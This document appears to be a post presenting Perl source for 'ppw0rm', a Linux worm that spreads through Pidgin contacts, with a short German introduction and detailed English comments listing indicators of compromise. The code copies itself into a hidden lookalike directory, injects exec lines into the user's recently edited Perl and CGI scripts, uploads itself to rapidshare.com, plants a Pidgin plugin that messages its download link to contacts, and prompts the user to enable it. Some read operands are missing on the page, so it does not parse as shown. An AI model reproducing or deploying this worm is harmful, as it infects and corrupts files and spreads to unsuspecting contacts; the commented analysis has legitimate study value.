ppw0rm ist ein *NIX-Wurm, der sich über Pidgin verbreitet! Dazu nutzt er
das Pidgin-Perl-Interface, um sich zu verbreiten. Zuerst wird der User dazu
aufgefordert, das Plugin zu aktivieren. Dann verbreitet sich der Wurm über
alle ICQ-Kontakte. Dazu schickt er jedem einen Rapidshare-DL-Link. Natürlich
wird bei jedem Ausführen der Wurm erneut auf Rapidshare geupped!
#!/usr/bin/perl
# ppw0rm - by Perforin [VXnetw0rk]
use Digest::MD5("md5_hex");
use MIME::Base64;
use Fcntl;
use File::Basename;
use IO::Socket;
# Entry point. $^O is the OS name; the worm body (linux()) only runs on
# Linux, on any other platform the script just prints the message and ends.
# The same message string is reused as a failure message inside pspread().
if ($^O =~ m/linux/i) { linux(); } else { print "If you don't trust anybody with anything at all, why bother interacting with them?\n"; }
# linux() - dropper / file-infector stage.
# 1. Copies this script into a lookalike directory ".purpIe" (capital I,
#    next to Pidgin's genuine ".purple") under the user's home.
# 2. Injects an exec() of that copy into every .pl/.cgi file listed in
#    Geany's recent-files history.
# 3. Calls pspread() for the network/propagation stage.
# There is no strict/warnings and no "my": every variable is a package
# global, and $/ is set globally (not local'd), so every later angle-bracket
# read in this file, including the socket reads in pspread(), slurps.
# IR indicators from this block: a ~/.purpIe/ directory, a
# pidgin-plugin-core.pl copy of this script inside it, and an added
# exec("/home/<user>/.purpIe/pidgin-plugin-core.pl") line in recently edited
# Perl/CGI scripts.
sub linux {
# $0 is the path of the running script. 64000 is the sysread() chunk size
# used by the upload loop in pspread(). $cursorsize is never read again:
# the upload loop uses the differently spelled global $cursize instead.
($file,$maxbufsize,$cursorsize) = ($0,64000,0);
# Slurp mode on the global $/; -s gives own file size, later used as the
# upload Content-Length and as a sanity check in pspread().
($/,$size,$filename) = (undef,-s $file,basename($file));
# The line that gets injected into other scripts. exec() replaces the
# process, so an infected script never runs past the injected line.
($exe) = ('exec("/home/$ENV{\'LOGNAME\'}/.purpIe/pidgin-plugin-core.pl");');
# Read own source into memory. As printed on this page the read operand on
# the assignment below is missing (presumably stripped as markup), so the
# line does not parse as shown.
open(FH,"<",$file);
$filecontent = ;
close(FH);
# Drop directory, requested world-writable (mode still subject to umask).
# This line uses $HOME while every other path in the file is built from
# "/home/$LOGNAME"; the two only agree when the home directory is under /home.
mkdir("$ENV{'HOME'}/.purpIe",0777);
# Write the self-copy that the injected exec() line points at. None of the
# open()/print/close() calls in this sub are error-checked.
open(hide,">","/home/$ENV{'LOGNAME'}/.purpIe/pidgin-plugin-core.pl");
print hide $filecontent;
close(hide);
# Target discovery: Geany's config carries a recent_files= list. If the
# config cannot be opened, pspread() is called right here as a fallback -
# and, because execution simply continues, runs a second time at the end of
# this sub.
open(GY,"<","/home/$ENV{'LOGNAME'}/.config/geany/geany.conf") || pspread();
# The loop condition is empty on this page (apparently stripped as well);
# with an empty condition this would loop unconditionally as written. The
# intent is to capture the value after "recent_files=".
while () { if ($_ =~ m/recent_files=(.*)/i) { $GYR = $1; } }
close(GY);
# recent_files entries are ';'-separated paths.
@gyrfiles = split(/\;/,$GYR);
foreach $ipath (@gyrfiles) {
# Only Perl and CGI scripts are touched.
if ($ipath =~ m/\w*\.(pl|cgi)$/i) {
# Read the target's lines (operand missing on this page too), then reopen
# the same path for writing. ">" truncates first, so if the read yielded
# nothing the target ends up empty: the infector destroys the file on a
# failed read.
open(IPATHFILE,"<",$ipath);
@ipathline = ;
close(IPATHFILE);
open(infected,">",$ipath);
foreach $line (@ipathline) {
print infected $line;
# \s{1,10} matches any line containing whitespace, i.e. the first line with
# a space or tab. $exe is written right after that line, once per file,
# guarded by $injection_counter (reset below).
if ($line =~ m/\s{1,10}/) {
$injection_counter++;
if ($injection_counter == 1) { print infected $exe . "\n"; }
}
}
close(infected);
undef($injection_counter);
}
}
# Propagation stage: upload self and plant the Pidgin plugin.
pspread();
}
# pspread() - propagation stage.
# Uploads this script to rapidshare.com through its upload API, takes the
# returned download URL, and writes a Pidgin Perl plugin into the genuine
# ~/.purple/plugins/ directory. The plugin body is mostly base64-encoded
# here (the first blob is elided on this page) with one plaintext line that
# sends the URL to a contact via $im->send(). Finally the user is nagged with
# xmessage to enable the plugin by hand.
# Relies on globals set in linux(): $filecontent, $size, $file, $filename,
# $maxbufsize, and the global slurp setting of $/.
# Network indicators: HTTP/1.0 to rapidshare.com:80 and rs<N>l3.rapidshare.com:80.
# Host indicators: ~/.purple/plugins/plugin-core.pl, ~/.purpIe/txt.msg, and an
# xmessage process launched through the shell.
sub pspread {
# Uppercased MD5 of own content; compared later with the server's File1.4 field.
$md5hex = uc(md5_hex($filecontent));
# Sanity check: in-memory size must match the -s size taken in linux().
# "die exit" evaluates exit first, so the process terminates with status 0
# and die is never reached; the same holds for every "die exit" below.
$size2 = length($filecontent);
unless ($size == $size2) { die exit; }
# Ask the API which upload server to use. Since $/ is undef globally,
# <$socket> returns the whole response; the digits right after the header
# separator are the server id. The connect result is never checked.
$socket = IO::Socket::INET->new(PeerAddr => "rapidshare.com:80");
print $socket "GET /cgi-bin/rsapi.cgi?sub=nextuploadserver_v1 HTTP/1.0\r\n\r\n";
($uploadserver) = <$socket> =~ /\r\n\r\n(\d+)/;
unless ($uploadserver) { die exit; }
# Reopen self read-only for the chunked upload loop.
sysopen($fh, $file, O_RDONLY) || die exit;
# Second connection, to the upload host derived from the server id
# (again unchecked).
$socket = IO::Socket::INET->new(PeerAddr => "rs$uploadserver" . "l3" . ".rapidshare.com:80");
# Hand-built multipart/form-data POST: an rsapi_v1=1 field plus the file
# part; Content-Length is computed from the parts and the -s size.
$boundary = "---------------------632865735RS4EVER5675865";
$contentheader .= "$boundary\r\nContent-Disposition: form-data; name=\"rsapi_v1\"\r\n\r\n1\r\n";
$contentheader .= "$boundary\r\nContent-Disposition: form-data; name=\"filecontent\"; filename=\"$filename\"\r\n\r\n";
$contenttail = "\r\n$boundary--\r\n";
$contentlength = length($contentheader) + $size + length($contenttail);
$header = "POST /cgi-bin/upload.cgi HTTP/1.0\r\nContent-Type: multipart/form-data; boundary=$boundary\r\nContent-Length: $contentlength\r\n\r\n";
print $socket "$header$contentheader";
# Stream the file in $maxbufsize chunks. $cursize is never initialized
# (linux() set $cursorsize instead); undef compares as 0, so the loop still
# starts. A short/zero read ends the process.
while ($cursize < $size) {
$bufferlen = sysread($fh, $buffer, $maxbufsize, 0) || 0;
unless ($bufferlen) { die exit; }
$cursize += $bufferlen;
print $socket $buffer;
}
print $socket $contenttail;
# Response body is key=value lines. File1.1 is the download URL, File1.4 the
# server-side MD5, which must equal our own hash before going further.
($result) = <$socket> =~ /\r\n\r\n(.+)/s;
unless ($result) { die exit; }
foreach (split(/\n/, $result)) { if ($_ =~ /([^=]+)=(.+)/) { $key_val{$1} = $2 } }
if ($md5hex ne $key_val{"File1.4"}) { die exit; }
$DL_URL = $key_val{"File1.1"};
# Plant the Pidgin plugin into the genuine plugin directory. On open failure
# only a message is printed and the print to the unopened handle still runs.
# The decoded plugin text is spliced around a plaintext line that sends
# $DL_URL with $im->send(); the first base64 blob is elided on this page and
# the second appears to decode to the plugin's closing plugin_unload() sub.
open(PC,">","/home/$ENV{'LOGNAME'}/.purple/plugins/plugin-core.pl") || print "If you don't trust anybody with anything at all, why bother interacting with them?\n";
print PC decode_base64("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=
") . "\n" . "\$im->send(\"WTF -> $DL_URL This is a must have pidgin plugin!\");" . "\n" . decode_base64("
ICAgICRjb252MS0+ZGVzdHJveSgpOw0KICB9DQp9DQoNCnN1YiBwbHVnaW5fdW5sb2FkIHsNCiAg
ICBteSAkcGx1Z2luID0gc2hpZnQ7DQogICAgUHVycGxlOjpEZWJ1Zzo6aW5mbygiUGlkZ2luIGNv
cmUgcGx1Z2luIiwgInBsdWdpbl91bmxvYWQoKSAtIFBpZGdpbiBjb3JlIHBsdWdpbiB1bmxvYWRl
ZC5cbiIpOw0KfQ0K");
close(PC);
# Social-engineering step: Pidgin does not auto-enable plugins, so the user
# is asked to turn it on in the Ctrl+U plugin dialog. The "<>" in the text is
# presumably a plugin name lost to markup stripping. system() is given one
# interpolated string, i.e. it goes through the shell, with $LOGNAME taken
# from the environment unvalidated.
open(MSG,">","/home/$ENV{'LOGNAME'}/.purpIe/txt.msg") || print "Please activate <> by yourself\nin the plugin section of pidgin.\nPress CTRL + U to get there!";
print MSG <<"MSG";
Please activate <> by yourself
in the plugin section of pidgin.
Press CTRL + U to get there!
MSG
close(MSG);
system("xmessage -center -file /home/$ENV{'LOGNAME'}/.purpIe/txt.msg");
}